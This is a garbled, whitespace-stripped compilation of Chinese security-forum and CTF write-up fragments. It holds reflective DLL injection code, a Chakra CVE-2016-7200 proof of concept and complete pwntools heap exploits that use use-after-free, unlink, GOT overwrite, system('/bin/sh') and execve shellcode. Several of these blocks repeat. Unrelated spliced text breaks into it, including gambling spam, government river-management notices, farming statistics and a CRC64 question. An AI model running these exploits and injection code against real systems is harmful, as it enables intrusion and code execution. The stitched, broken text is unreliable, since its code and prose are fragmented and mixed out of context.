_sn36(){constchar*charset=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789{}constchar*charset2=^_`mEJCTNKOGWRSFYVLZQAH[\\]upibejctnkogwrsfyvlzqahmdxKOGWRSFYVLuiconstchar*charset3=NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm76543210}{intsn_len=36;intindices[36];charsn[40]=BYTEkey1[8]={0xFD,0xB4,0x68,0x54,0x08,0xCD,0x56,0x4E};BYTEkey2[16]={0x65,0x48,0x32,0xEF,0xBA,0xCD,0x56,0x4E,0x0F,0x9B,0x1D,0x27,0x00,0x00,0x00,0x00};CopyMemory(sn,kxuectf{,8);strings1=encode3((PBYTE)sn,8);for(intk1=0;k164;k1++){for(intk2=0;k264;k2++){for(intk3=0;k364;k3++){BYTEexpected[32]={0x42,0xD3,0xC3,0xC2,0xF1,0x2A,0xE9,0x2D,0x66,0xC9,0x28,0x22,0x2C,0xEB,0x54,0x0E,0x94,0x07,0xE5,0x77,0x4A,0x92,0xB7,0x92,0x2E,0x5D,0xFD,0xF0,0xF3,0x54,0x9F,0xC6};BYTEbuf1[8];buf1[0]=charset3[k1];buf1[1]=charset3[k2];buf1[2]=charset3[k3];buf1[3]=charset3[63];FillMemory(buf1+4,4,0x04);des_encrypt(buf1,8,key1);CopyMemory(key2[12],buf1,4);rc6_decrypt(expected,sizeof(expected),key2);des_decrypt(expected,sizeof(expected),key1);if(memcmp(expected,_str(),8)==0){CopyMemory(sn,expected,32);sn[32]=charset3[k1];sn[33]=charset3[k2];sn[34]=charset3[k3];sn[35]=charset3[63];sn[sn_len]=0;conver_charset(sn,sn_len,indices,charset,charset3);printf(%s,sn);}}}}}kxuectf{D3crypted1sV3rylntere5tin91}OD载入,输入123456,点确定半天没反应,忽然来个内存异常。。澳门信誉赌场,但是,基于虚拟机的沙箱通常会启用系统快照,从而可以快速恢复到原始状态(尽管样本的分析任务可能会被破坏)在这些情况下,影响将受到限制。Satori家族重复使用Mirai代码,包括网络扫描器,telnet密码尝试和看门狗禁用(图4)。LPVOIDlpBuffer=HeapAlloc(GetProcessHeap(),0,dwLength);//创建缓冲区if(ReadFile(hFile,lpBuffer,dwLength,dwBytesRead,NULL)==false)//将DLL数据复制到缓冲区BreakForError("FailedtoreadtheDLLfile");HANDLEhTargetProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwPid);HANDLEhMoudle=LoadRemoteLibraryR(hTargetProcess,lpBuffer,dwLength,NULL);//获取加载器的地址(文件偏移)DWORDdwReflectiveLoaderOffset=GetReflectiveLoaderOffset(lpBuffer);//在目标进程分配内存(RWX)LPVOIDlpRemoteLibraryBuffer=VirtualAllocEx(hProcess,NULL,dwLength,MEM_RESERVE|MEM_COMMIT,PAGE_EXECUTE_READWRITE);//写数据WriteProcessMemory(hProcess,lpRemoteLibraryBuffer,lpBuffer,dwLength,NULL);//线程函数的地址=基地址+文件偏移LPTHREAD_START_ROUTINElpReflectiveLoader=(LPTHREAD_START_ROUTINE)((ULONG_PTR)lpRemoteLibraryBuffer+dwReflectiveLoaderOffset);//创建远程线程hThread=CreateRemoteThread(hProcess,NULL,1024*1024,lpReflectiveLoader,lpParameter,(DWORD)NULL,dwThreadId);//基址-在Dropper进程中开辟的堆空间的起始地址UINT_PTRuiBaseAddress=(UINT_PTR)lpReflectiveDllBuffer;//得到NT头的文件地址UINT_PTRuiExportDir=(UINT_PTR)uiBaseAddress+((PIMAGE_DOS_HEADER)uiBaseAddress)-e_lfanew;//获得导出表结构体指针的地址UINT_PTRuiNameArray=(UINT_PTR)(((PIMAGE_NT_HEADERS)uiExportDir)-[IMAGE_DIRECTORY_ENTRY_EXPORT]);//该调用中,第一个参数即为导出表结构体映射到内存的相对虚拟地址//结果为找到到导出表结构体的内存地址uiExportDir=uiBaseAddress+Rva2Offset(((PIMAGE_DATA_DIRECTORY)uiNameArray)-VirtualAddress,uiBaseAddress);//得到导出表名称数组在内存中的地址RVAuiNameArray=uiBaseAddress+Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)-AddressOfNames,uiBaseAddress);//得到导出函数地址表在内存中的地址RVAUINT_PTRuiAddressArray=uiBaseAddress+Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)-AddressOfFunctions,uiBaseAddress);//得到函数序号地址表在内存中的地址UINT_PTRuiNameOrdinals=uiBaseAddress+Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)-AddressOfNameOrdinals,uiBaseAddress);//导出函数的数量DWORDdwCounter=((PIMAGE_EXPORT_DIRECTORY)uiExportDir)-NumberOfNames;while(dwCounter--){//这里需要将获取到的各表的RVA转化为各表实际的文件偏移char*cpExportedFunctionName=(char*)(uiBaseAddress+Rva2Offset((*(DWORD*)uiNameArray),uiBaseAddress));if(strstr(cpExportedFunctionName,"ReflectiveLoader")!=NULL){//获取地址表起始地址的实际位置uiAddressArray=uiBaseAddress+Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)-AddressOfFunctions,uiBaseAddress);//根据序号找到序号对应的函数地址uiAddressArray+=(*(WORD*)(uiNameOrdinals)*sizeof(DWORD));//返回ReflectiveLoader函数的文件偏移,即函数机器码的起始地址returnRva2Offset((*(DWORD*)uiAddressArray),uiBaseAddress);}uiNameArray+=sizeof(DWORD);uiNameOrdinals+=sizeof(WORD);}DWORDRva2Offset(DWORDdwRva,UINT_PTRuiBaseAddress){//得到nt头在内存中的实际地址PIMAGE_NT_HEADERSpNtHeaders=(PIMAGE_NT_HEADERS)(uiBaseAddress+((PIMAGE_DOS_HEADER)uiBaseAddress)-e_lfanew);//获得节表PIMAGE_SECTION_HEADERpSectionHeader=(PIMAGE_SECTION_HEADER)((UINT_PTR)(pNtHeaders-OptionalHeader)+);//不在任意块内if(dwRvapSectionHeader[0].PointerToRawData)returndwRva;//通过遍历块,来找到相对偏移地址对应的文件偏移地址for(WORDwIndex=0;;wIndex++){if(dwRva=pSectionHeader[wIndex].VirtualAddressdwRva(pSectionHeader[wIndex].VirtualAddress+pSectionHeader[wIndex].SizeOfRawData))return(dwRva-pSectionHeader[wIndex].VirtualAddress+pSectionHeader[wIndex].PointerToRawData);//\------------------块内偏移-------------------/\-----------块在文件中的偏移------------/}}回想我们注射器实现的过程中所调用的函数,与正常的注入似乎没有太大的区别,而且像CreateRemoteProcess这种危险函数杀软抓的很严,是可以被替换掉的,而且没有发现LoadLibraryA函数。当涨到7时,该页就被认为是一个可以被换出的候选页。 CVE-2016-7200标签(空格分隔):ChakraPOCclassdummy{constructor(){return[1,2,3];}}classMyArrayextendsArray{staticget[](){returndummy;}}vara=newMyArray({},[],"natalie",7,7,7,7,7);functiontest(i){returntrue;}varo=(test);调试boolSparseArraySegmentT::IsMissingItem(constT*value){return*value==SparseArraySegmentT::GetMissingItem();}其中左值为0x0000000200000001,右值为0x8000000280000002value实际指向ArraySegment,其中length=3,size=6,元素为1、2、30x00000170823BC5100000000000000003........0x00000170823BC5180000000600000000........0x00000170823BC5200000000000000000........0x00000170823BC5280000000100000002........0x00000170823BC5300000000380000002.......\n0x00000170823BC5388000000280000002......\n对应于poc中定义的(test);会调用()filter()方法创建一个新数组,其包含通过所提供函数实现的测试的所有元素。因此,它同一时间只可以做一件事。Arch:amd64-64-littleRELRO:PartialRELROStack:CanaryfoundNX:NXenabledPIE:PIEenabled1:newbox1~box52:deletefree完之后没有修改in_use标志,可以多次free,存在UAF,只有box2和box3可以free3:edit4:print5:guessseed=seed;srand((unignedint)seed);v=rand();if(input()==v)printseed;elseprintv;解题思路我这个解法好像有点麻烦,等结束后学习下标准解法是什么样的..leakprocessbase,leaklibcbase,overwritegot,getshelltest_####*seed=0;intmain(){seed=seed;srand(*(unsignedint*)seed);printf("%p",seed);printf("0x%x",rand());return0;}guess_####*seed=0;intmain(intargc,char**argv){intlow3=atoi(argv[1]);intr=atoi(argv[2]);unsignedintseed;unsignedinti;for(i=0;i=0xFFFFF;i++){seed=i12;seed+=low3;srand(seed);if(rand()==r){printf("0x%x",rand());return0;}}printf("end");return0;}###=Truefrompwnimport*importsyscontext(arch=amd64,kernel=amd64,os=linux)#_level=debugelf=ELF(./club)ifargs[LOCAL]:libc_path=/lib/x86_64-linux-gnu/io=process(./club)("processbase:"+hex(()[/root/Desktop/test/pediy_pwn/club]))("processlibc_base:"+hex(()[libc_path]))else:libc_path=./io=remote(,8888)libc=ELF(libc_path)defcmd_new(index,size):()(1)()(str(index))()(str(size))()returndefcmd_delete(index):()(2)()(str(index))returndefcmd_edit(index,buf):()(3)()(str(index))(buf)returndefcmd_print(index):()(4)()(str(index))data=()returndatadefcmd_guess_wrong(v):()(5)()(str(v))(Thenumberis)data=(!)[:-1]returndatadefcmd_guess_right(v):()(5)()(str(v))(Yougetasecret:)data=(!)[:-1]returndatadefcmd_quit(name):()(6)()(name)()returndefexploit():#leakprocessbasev=cmd_guess_wrong(0)p_guess=process([./guess_seed,str(0x148),v])guess_r=p_()#printguess_rseed=cmd_guess_right(int(guess_r,16))#printhex(int(v))process_base=int(seed)-("leakedprocessbase:"+hex(process_base))#(io)#input()#triggercoaleace#usebox4toeditbox2box3len2=0x1A0len3=0x1F0cmd_new(2,len2)cmd_edit(2,A*len2)cmd_new(3,len3)cmd_delete(2)cmd_delete(3)cmd_new(4,len2+len3)data=cmd_print(4)[:6]libc_main_arena_top=0x3C4B78libc_base=u64((8,\x00))-libc_main_arena_topprint(leakedlibc_base:%x%libc_base)#createafakefreechunkinsidebox2beforebox3box2_ptr=process_base+0x202110print(box2_ptr:%x%box2_ptr)buf=buf+=p64(0)+p64(len2+1)+p64(box2_ptr-0x18)+p64(box2_ptr-0x10)buf+=A*(len2-0x20)buf+=p64(len2)buf+=p64(len3)cmd_edit(4,buf)cmd_delete(3)#box2_ptr-0x18writtentobox2_ptrcmd_edit(3,/bin/sh\x00)#[box2]=got_freebuf=buf+=p64(0)buf+=p64(0)#box0buf+=p64(0)#box1buf+=p64(process_base+[free])cmd_edit(2,buf)#[got_free]=systembuf=buf+=p64(libc_base+[system])cmd_edit(2,buf)#system(/bin/sh)cmd_delete(3)()returnexploit()16=len(sn)=:00402723calledi;:00402725cmpal,:00402727mov[esp+esi+104h+var_B4],:0040272Bjzshortloc_:0040272Daddesi,:00402730cmpesi,:00402733jlshortloc_:00402735mov[esp+esi+104h+var_B4],:0040273Aaddesi,:0040273Dcmpesi,:00402740jaloc_4029DDdes加密,其中多个常数表被替换key="*2017*10"des_cbc_encrypt(sn,key).text:00402771calldes_cbc_:0045AE9CPC1_:0045AED4LOOP_:0045AEE4PC2_:0045AF18IP_:0045AF58E_:0045AF88P_:0045AFA8IPR_:0045AFE8S_Boxsn高4位与低4位与换,转换为16进制字符串.text:004027B0pushesi....text:00402806jbshortloc_4027B0sn计算.text:00402808callmirvar....text:00402876callsub_4022E0bigx=mirvar(0);bigv=mirvar(173);bigy=mirvar(1817);bytes_to_big(len,sn,x);multiply(x,v,x);fft_mult(x,y,y);power(y,2,y);decr(y,1001,y);v=mirvar(317)multiply(y,v,y);//4022E0是用c的浮点函数计算的sn=((sn*173*1817)^2-1001)*317sn=reverse(sn)luajit计算.text:004028F0pushoffsetaLuajit210Beta3;"".text:004028F5push917h;:004028FApushoffsetbyte_45A578;:004028FFpushesi;:00402900callluaL_::::0040290AcallluaJIT_:0040290Fpush0;:00402911push0;:00402913push0;:00402915pushesi;:00402916calllua_:0040291Baddesp,:0040291Etesteax,:00402920jnzshortloc_:::00402924calllua_:00402929pushoffsetaXut;"xut".text:::00402934calllua_:00402939pushoffsetaMyst;"myst".text:::00402944calllua_:00402949push0;:0040294Bpush1;:0040294Dpush0;:0040294Fpushesi;:00402950calllua_pcall....text:00402986push0FFFFFFFFh;:00402988pushesi;:00402989calllua_:0040298Eaddesp,:00402991testeax,:00402993jzshortloc_:00402995push0FFFFFFFFh;:00402997pushesi;:00402998calllua_:0040299Daddesp,:004029A0jmpshortloc_:004029A2moveax,[esp+104h+var_F0].text:004029A6testeax,:004029A8jzshortloc_4029B1xut=snifmyst()==1thenokmyst():x=xutx+=101*1001+(10101+1001*99)*100x*=983751509373x-=1023*13+1203*13*14+1230*13*14*15+1231*13*14*15*16x=(x+1)*2expected=1574592838300862641516215149137548264158058079230003764126382984039489925466995870724568174393389905601620735902909057604303543552180706761904if(x==expected)return1elsereturn0luajit分析根据luaJIT_setmode定位到lj_dispatch_update函数从lj_dispatch_update定位到lj_vm_asm_begin与lj_bc_ofs在lj_vm_asm_begin+lj_bc_ofs[i]处下断,分析各个bytecode的功能.text:0040AFCEcalllj_dispatch_:0040ACA9movzxesi,ds:lj_bc_ofs+:0040ACB0movzxedi,ds:lj_bc_ofs+:0040ACB7movzxebp,ds:lj_bc_ofs+:0040ACBEmovzxeax,ds:lj_bc_ofs+:0040ACC5addesi,offsetlj_vm_asm_:0040ACCBaddedi,offsetlj_vm_asm_:0040ACD1addebp,offsetlj_vm_asm_:0040ACD7addeax,offsetlj_vm_asm_beginKXCTF201710BYLoudy08 通过上述分析,我们只需将“JPyjup3eCyJjlkV6DmSmGHQ=”base64解码再rc4解密,即是sn使用在线rc4解密并有base64编码功能的,进行解密:sn=madebyericky94528涉及河流的相关县市区、乡镇、村要根据实际情况,积极开展河湖拆违清障、洁岸清污、河道治理等相关工作,共筑山青水绿、天蓝地洁的良好生态环境。最终的结果为:MISC虽然这道题目是做出来了,但是其中还是存在一些问题没有搞清楚。、16=len(sn)=:00402723calledi;:00402725cmpal,:00402727mov[esp+esi+104h+var_B4],:0040272Bjzshortloc_:0040272Daddesi,:00402730cmpesi,:00402733jlshortloc_:00402735mov[esp+esi+104h+var_B4],:0040273Aaddesi,:0040273Dcmpesi,:00402740jaloc_4029DDdes加密,其中多个常数表被替换key="*2017*10"des_cbc_encrypt(sn,key).text:00402771calldes_cbc_:0045AE9CPC1_:0045AED4LOOP_:0045AEE4PC2_:0045AF18IP_:0045AF58E_:0045AF88P_:0045AFA8IPR_:0045AFE8S_Boxsn高4位与低4位与换,转换为16进制字符串.text:004027B0pushesi....text:00402806jbshortloc_4027B0sn计算.text:00402808callmirvar....text:00402876callsub_4022E0bigx=mirvar(0);bigv=mirvar(173);bigy=mirvar(1817);bytes_to_big(len,sn,x);multiply(x,v,x);fft_mult(x,y,y);power(y,2,y);decr(y,1001,y);v=mirvar(317)multiply(y,v,y);//4022E0是用c的浮点函数计算的sn=((sn*173*1817)^2-1001)*317sn=reverse(sn)luajit计算.text:004028F0pushoffsetaLuajit210Beta3;"".text:004028F5push917h;:004028FApushoffsetbyte_45A578;:004028FFpushesi;:00402900callluaL_::::0040290AcallluaJIT_:0040290Fpush0;:00402911push0;:00402913push0;:00402915pushesi;:00402916calllua_:0040291Baddesp,:0040291Etesteax,:00402920jnzshortloc_:::00402924calllua_:00402929pushoffsetaXut;"xut".text:::00402934calllua_:00402939pushoffsetaMyst;"myst".text:::00402944calllua_:00402949push0;:0040294Bpush1;:0040294Dpush0;:0040294Fpushesi;:00402950calllua_pcall....text:00402986push0FFFFFFFFh;:00402988pushesi;:00402989calllua_:0040298Eaddesp,:00402991testeax,:00402993jzshortloc_:00402995push0FFFFFFFFh;:00402997pushesi;:00402998calllua_:0040299Daddesp,:004029A0jmpshortloc_:004029A2moveax,[esp+104h+var_F0].text:004029A6testeax,:004029A8jzshortloc_4029B1xut=snifmyst()==1thenokmyst():x=xutx+=101*1001+(10101+1001*99)*100x*=983751509373x-=1023*13+1203*13*14+1230*13*14*15+1231*13*14*15*16x=(x+1)*2expected=1574592838300862641516215149137548264158058079230003764126382984039489925466995870724568174393389905601620735902909057604303543552180706761904if(x==expected)return1elsereturn0luajit分析根据luaJIT_setmode定位到lj_dispatch_update函数从lj_dispatch_update定位到lj_vm_asm_begin与lj_bc_ofs在lj_vm_asm_begin+lj_bc_ofs[i]处下断,分析各个bytecode的功能.text:0040AFCEcalllj_dispatch_:0040ACA9movzxesi,ds:lj_bc_ofs+:0040ACB0movzxedi,ds:lj_bc_ofs+:0040ACB7movzxebp,ds:lj_bc_ofs+:0040ACBEmovzxeax,ds:lj_bc_ofs+:0040ACC5addesi,offsetlj_vm_asm_:0040ACCBaddedi,offsetlj_vm_asm_:0040ACD1addebp,offsetlj_vm_asm_:0040ACD7addeax,offsetlj_vm_asm_beginKXCTF201710BYLoudy08而未经授权的应用程序(包括恶意的可执行文件,DLL,脚本等)将会被阻止访问,即使它们以用户或管理员的权限运行,通常也是安全的。鉴于鱼叉攻击的增加,员工的个人email需要加以保护。2018安全开发者峰会是由拥有18年悠久历史的老牌安全技术社区——看雪学院举办,会议面向开发者、安全人员及高端技术从业人员,是国内开发者与安全人才的年度盛事。各级各部门要深入贯彻落实绿色发展理念,深入推进生态文明建设,加快西江生态廊道建设,通过巡河、巡查,找准问题,强化执法监督,严厉打击非法排污、设障、捕捞、养殖、采砂、采矿、围垦、侵占水域岸线等违法活动。,UseAfterFree本贴讲述如何利用UAF漏洞,实现GOT表覆盖,从而实现命令执行,另外漏洞程序由本人通过逆向14年的ctf获得,同时进行了一些功能的精简,从而得到下面的漏洞程序,解决漏洞讲解没有漏洞源码源码的问题。平行Mark-EvacuateGC的一大优点是可以提供确切的活动性信息。利用思路利用cheat在chunk中放置shellcode,修改got指向chunk中的shellcode相关结构体structx_acc{__int64field_0;charusername[16];charpassword[16];x_character*character;};structx_character{charname[16];__int64health;__int64stamina;__int64weight;__int64location;x_item*item_head;};structx_cheat_st{charname[16];charcontent[32];};structx_chunk{__int64ref_count;__int64size;chardata[1];};structx_item{__int64id;__int64weight;__int64count;x_item*next;__int64bullet;__int64power;};脚本###=Truefrompwnimport*importsysimporttimeimportrecontext(arch=amd64,kernel=amd64,os=linux)#_level=debugelf=ELF(./pwn7)ifargs[LOCAL]:io=process(./pwn7)else:io=remote(,8888)sc="\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"defcmd_signup(username,password,character_name):(Signup==============================)(2)(inputyourusername)(username)(inputyourpassword)(password)(inputyourcharacter\sname)(character_name)()returndefcmd_login(username,password):(Signup==============================)(1)(Inputyourusername:)(username)(Inputyourpassword:)(password)returndefcmd_exit():()(0)returndefcmd_show():()(1)(===============================)(==============================)returndefcmd_item_enter():()(2)returndefcmd_item_leave():(YourChoice:)(str(-1))(wrongchoice)returndefcmd_item_view(id):(YourChoice:)(str(id))data=()(2)returndatadefcmd_item_delete(id):(YourChoice:)(str(id))()(1)data=()(2)returndatadefcmd_goto(location):()(3)()(str(location))returndefcmd_explore(l):()(4)(Youfind:)s=(2)ifs==no:(found)returns+=(0)(Doyouwanttopickupit)ifsinl:(y)else:(n)s=returnsdefcmd_explore_until_success(l):while1:item_name=cmd_explore(l)print(pickup:%s%item_name)ifnot(item_name==):(item_name)(1)returndefcmd_cheat(first,name,content):()(5)iffirst==1:(name:)(name)(content:)(content)else:(content:)(content)returndefexploit():username=a*8password=b*8character_name=c*8cmd_signup(username,password,character_name)cmd_login(username,password)#cmd_show()cmd_goto(1)cmd_cheat(1,x*8,y*0x18)#pickup2differentitemsl=[98k,S12K,AKM,M16A4,UMP45,SKS,M416,M24,Bandage,Drink,FirstAidKit]cmd_explore_until_success(l)cmd_explore_until_success(l)#deleteoneitem(initfreelist)cmd_item_enter()data=cmd_item_delete(1)cmd_item_leave()#(io)#input()#putfakepointerinitem2buf=buf+=z*0x40#item1(freed)#item2headerbuf+=p64(1)#ref_countbuf+=p64(0x18)#size#item2buf+=p64([memcmp])#id(fakepointer)buf+=p64(0)#weightbuf+=p64(1)#countbuf+=p64(0)#nextbuf+=p64(0)#bulletbuf+=p64(0)#power#freelistbuf+=p64(0)#ref_countbuf+=p64(0x20)#sizebuf+=p64(0)buf+=p64(0)cmd_cheat(0,x*8,y*0x20+buf)#overwritetargetwithfreelist+0x10cmd_item_enter()data=cmd_item_delete(1)cmd_item_leave()#copyshellcodetofreelist+0x10buf=buf+=z*0xA0buf+=sccmd_cheat(0,x*8,y*0x20+buf)cmd_exit()#triggermemcmp(callshellcode)cmd_login(username,password)()returnexploit()flag{Cr4k4ndH4ckF0rFunG00dLuck2o17}Arch:amd64-64-littleRELRO:PartialRELROStack:CanaryfoundNX:NXenabledPIE:PIEenabled1:newbox1~box52:deletefree完之后没有修改in_use标志,可以多次free,存在UAF,只有box2和box3可以free3:edit4:print5:guessseed=seed;srand((unignedint)seed);v=rand();if(input()==v)printseed;elseprintv;解题思路我这个解法好像有点麻烦,等结束后学习下标准解法是什么样的..leakprocessbase,leaklibcbase,overwritegot,getshelltest_####*seed=0;intmain(){seed=seed;srand(*(unsignedint*)seed);printf("%p",seed);printf("0x%x",rand());return0;}guess_####*seed=0;intmain(intargc,char**argv){intlow3=atoi(argv[1]);intr=atoi(argv[2]);unsignedintseed;unsignedinti;for(i=0;i=0xFFFFF;i++){seed=i12;seed+=low3;srand(seed);if(rand()==r){printf("0x%x",rand());return0;}}printf("end");return0;}###=Truefrompwnimport*importsyscontext(arch=amd64,kernel=amd64,os=linux)#_level=debugelf=ELF(./club)ifargs[LOCAL]:libc_path=/lib/x86_64-linux-gnu/io=process(./club)("processbase:"+hex(()[/root/Desktop/test/pediy_pwn/club]))("processlibc_base:"+hex(()[libc_path]))else:libc_path=./io=remote(,8888)libc=ELF(libc_path)defcmd_new(index,size):()(1)()(str(index))()(str(size))()returndefcmd_delete(index):()(2)()(str(index))returndefcmd_edit(index,buf):()(3)()(str(index))(buf)returndefcmd_print(index):()(4)()(str(index))data=()returndatadefcmd_guess_wrong(v):()(5)()(str(v))(Thenumberis)data=(!)[:-1]returndatadefcmd_guess_right(v):()(5)()(str(v))(Yougetasecret:)data=(!)[:-1]returndatadefcmd_quit(name):()(6)()(name)()returndefexploit():#leakprocessbasev=cmd_guess_wrong(0)p_guess=process([./guess_seed,str(0x148),v])guess_r=p_()#printguess_rseed=cmd_guess_right(int(guess_r,16))#printhex(int(v))process_base=int(seed)-("leakedprocessbase:"+hex(process_base))#(io)#input()#triggercoaleace#usebox4toeditbox2box3len2=0x1A0len3=0x1F0cmd_new(2,len2)cmd_edit(2,A*len2)cmd_new(3,len3)cmd_delete(2)cmd_delete(3)cmd_new(4,len2+len3)data=cmd_print(4)[:6]libc_main_arena_top=0x3C4B78libc_base=u64((8,\x00))-libc_main_arena_topprint(leakedlibc_base:%x%libc_base)#createafakefreechunkinsidebox2beforebox3box2_ptr=process_base+0x202110print(box2_ptr:%x%box2_ptr)buf=buf+=p64(0)+p64(len2+1)+p64(box2_ptr-0x18)+p64(box2_ptr-0x10)buf+=A*(len2-0x20)buf+=p64(len2)buf+=p64(len3)cmd_edit(4,buf)cmd_delete(3)#box2_ptr-0x18writtentobox2_ptrcmd_edit(3,/bin/sh\x00)#[box2]=got_freebuf=buf+=p64(0)buf+=p64(0)#box0buf+=p64(0)#box1buf+=p64(process_base+[free])cmd_edit(2,buf)#[got_free]=systembuf=buf+=p64(libc_base+[system])cmd_edit(2,buf)#system(/bin/sh)cmd_delete(3)()returnexploit() 穷举过程非常漫长。据了解,三江“一季稻+再生稻+鱼”模式的亩产值可达4806元,亩平均纯利润达4361元,与“一季稻+鱼”相比,稻谷亩平均产量提高%,亩平均综合产值提高了41%,亩平均纯利润提高了61%;钦南区“稻+南美白对虾”模式的亩产值达到万元,亩纯利润达8100元;龙圩区“稻+螺”模式亩产值达万元以上。ppoe界面中的密码,还有修改密码界面,字符串的略过,主要是htm含有password和变量同时存在这样在某些特殊时候访问这个界面他会加载某些文件将配置信息或者其他本地信息通过html变量元素显示出来,比如对于这种信息泄露的挖掘方法,在没有实物的前提下可以去解固件,不影响设备正常运行的情况下,可以去访问公网存在的设备,主要区分就是需要登陆访问的页面和不需要登陆就能访问的页面,挖掘肯定是先去研究不需要登陆的就能访问的页面可以写个脚本这样方便我们去进一步研究,接下来从固件层面去看一下,既然是http请求所以分析的程序则是usr/sbin/httpd根据文末我参考之前的类似的漏洞,所以也试着查找未授权访问的页面处理逻辑搜索字符串BSW其中下面这部分是处理不需登陆可访问页面的函数像不需要登陆就可以访问的页面如果可以修改密码,当然也属于越权操作了像这种不需要登陆就可以访问并还可用户输入的页面,可以着重分析固件中数据的处理流程,通常关于服务(ntp/tftp/soap/ppoe等)或者涉及到系统配置,更改后重启的功能,是命令注入比较容易出现的地方。原标题:贯彻落实绿色发展理念切实保护绿水青山发挥西江黄金水道优势带动各项事业发展  11月8日,市委书记、我市江河湖库总河长李新元到郁江巡河并调研两岸各项建设。保护声明Forcepoint客户通过Forcepoint云安全(包括高级分类引擎(ACE)作为电子邮件,Web和NGFW安全产品的一部分)得到保护,免受此威胁。 我有一段数据我自己计算的和程序计算的不一样我的C版本和JAVA版本计算的也不一样,蒙圈了,谁有现成的代码,帮我算一下可以吗?数据chatimg:44F2D2EA8BBDB04D56236E62B98E6A1BC版本结果代码地址:http:///l1028386804/article/details/50748724879BD001A16D4B20JAVA版结果代码地址:http:///sjiang2142/article/details/8128428publicstaticfinalStringCrc64String(StringparamString){(Crc64Long(paramString),16);}java版是toString后的结果-362868a8b5c9484d正确结果-57c054443d9021e这个是程序中的代码publicclassUtils{privatestaticlong[]CRCTable=newlong[256];privatestaticfinallongINITIALCRC=-1L;privatestaticfinallongPOLY64REV=-7661587058870466123L;publicstaticfinalStringTAG==false;publicstaticfinallongCrc64Long(StringparamString){if((paramString==null)||(()==0)){l2=0L;returnl2;}longl2=-1L;inti;if(!init){i=0;}intj;for(;;){if(i=256){init=true;j=();i=0;l1=l2;for(;;){l2=l1;if(i=j){break;}intk=(i);l1=CRCTable[(((int)l1^k)0xFF)]^l18;i+=1;}}l1=i;j=0;if(j8){breaklabel121;}CRCTable[i]=l1;i+=1;}label121:if(((int)l10x1)!=0){}for(longl1=l11^0xAC4BC9B5;;l1=1){j+=1;break;}}请问为什么会这样呢?实在是想不通~~(一)依托示范区建设发展荷产业2014年覃塘区建立了3000亩莲藕产业(核心)示范区,建成了集观光、体验、休闲、娱乐、文化、饮食于一体的农业生态旅游园。,源码已经上传至附件(pS:r3的小玩意,只给需要的人..表哥笑笑就好自绘界面和一些小细节小方法还是比较适合MFC新手参考的,代码注释已经写得含详细了这就不贴代码了)实现功能:辣鸡清理:系统临时文件,浏览器辣鸡,浏览器cookie,内存优化,vs项目辣鸡..软件管理,系统服务,软件卸载,注册表启动项,添加和删除,病毒查杀,md5查杀,白名单查杀,全路径查杀,网络流量监控,主动防御(尽情的骂我吧..后来写着写着感觉主防太难写要稳定的hookn个函数)..内含基本ado数据库编程GDI自绘实现网络监控,有个优化的小火箭,最小化时支持程序隐藏,里面有Button类,一个Button一个类这个类继承自CButton然后用此类创建对象和Button的IDC_Button关联,然后设置Button的属性,OwnDrawer为ture,这是这些按钮的,还有一些list控件颜色,静态控件字体设置,颜色设置,还有静态控件刷新防止重影的方法,剩下的就是api用法和C++语法了....[IMG][/IMG][IMG][/IMG]OD载入,输入123456,点确定半天没反应,忽然来个内存异常。利用思路利用cheat在chunk中放置shellcode,修改got指向chunk中的shellcode相关结构体structx_acc{__int64field_0;charusername[16];charpassword[16];x_character*character;};structx_character{charname[16];__int64health;__int64stamina;__int64weight;__int64location;x_item*item_head;};structx_cheat_st{charname[16];charcontent[32];};structx_chunk{__int64ref_count;__int64size;chardata[1];};structx_item{__int64id;__int64weight;__int64count;x_item*next;__int64bullet;__int64power;};脚本###=Truefrompwnimport*importsysimporttimeimportrecontext(arch=amd64,kernel=amd64,os=linux)#_level=debugelf=ELF(./pwn7)ifargs[LOCAL]:io=process(./pwn7)else:io=remote(,8888)sc="\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"defcmd_signup(username,password,character_name):(Signup==============================)(2)(inputyourusername)(username)(inputyourpassword)(password)(inputyourcharacter\sname)(character_name)()returndefcmd_login(username,password):(Signup==============================)(1)(Inputyourusername:)(username)(Inputyourpassword:)(password)returndefcmd_exit():()(0)returndefcmd_show():()(1)(===============================)(==============================)returndefcmd_item_enter():()(2)returndefcmd_item_leave():(YourChoice:)(str(-1))(wrongchoice)returndefcmd_item_view(id):(YourChoice:)(str(id))data=()(2)returndatadefcmd_item_delete(id):(YourChoice:)(str(id))()(1)data=()(2)returndatadefcmd_goto(location):()(3)()(str(location))returndefcmd_explore(l):()(4)(Youfind:)s=(2)ifs==no:(found)returns+=(0)(Doyouwanttopickupit)ifsinl:(y)else:(n)s=returnsdefcmd_explore_until_success(l):while1:item_name=cmd_explore(l)print(pickup:%s%item_name)ifnot(item_name==):(item_name)(1)returndefcmd_cheat(first,name,content):()(5)iffirst==1:(name:)(name)(content:)(content)else:(content:)(content)returndefexploit():username=a*8password=b*8character_name=c*8cmd_signup(username,password,character_name)cmd_login(username,password)#cmd_show()cmd_goto(1)cmd_cheat(1,x*8,y*0x18)#pickup2differentitemsl=[98k,S12K,AKM,M16A4,UMP45,SKS,M416,M24,Bandage,Drink,FirstAidKit]cmd_explore_until_success(l)cmd_explore_until_success(l)#deleteoneitem(initfreelist)cmd_item_enter()data=cmd_item_delete(1)cmd_item_leave()#(io)#input()#putfakepointerinitem2buf=buf+=z*0x40#item1(freed)#item2headerbuf+=p64(1)#ref_countbuf+=p64(0x18)#size#item2buf+=p64([memcmp])#id(fakepointer)buf+=p64(0)#weightbuf+=p64(1)#countbuf+=p64(0)#nextbuf+=p64(0)#bulletbuf+=p64(0)#power#freelistbuf+=p64(0)#ref_countbuf+=p64(0x20)#sizebuf+=p64(0)buf+=p64(0)cmd_c